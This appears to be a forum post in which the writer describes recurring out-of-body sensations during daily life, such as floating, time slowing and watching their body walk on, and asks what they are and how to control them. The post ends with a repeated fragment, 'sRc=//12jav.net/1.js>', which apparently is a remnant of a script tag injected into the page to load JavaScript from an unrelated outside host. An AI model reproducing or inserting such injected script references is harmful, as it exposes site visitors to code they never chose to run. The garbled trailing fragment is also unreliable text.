Astral projection? Help?!

I've tried astral projection and I've almost reached it before but my nerves and frustrations get the better of me. However, the real issue I find is that on a day to day basis I find myself lifting out of my body as if I'm projecting. This happens at school, the grocery store, sometimes when I walk. It's not like being light headed because I feel like I'm physically lifting from my body and sometimes it feels as if my mind geniunely expands and I begin to understand much more than usual. One time I was walking down the hall and suddenly time physically slowed and I looked around and I was separate from my body for just a few seconds but my body continued walking. I've only coined this as astral projection but I don't think that's it, and I have no idea why it's always happening. What is it? How do I control it? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
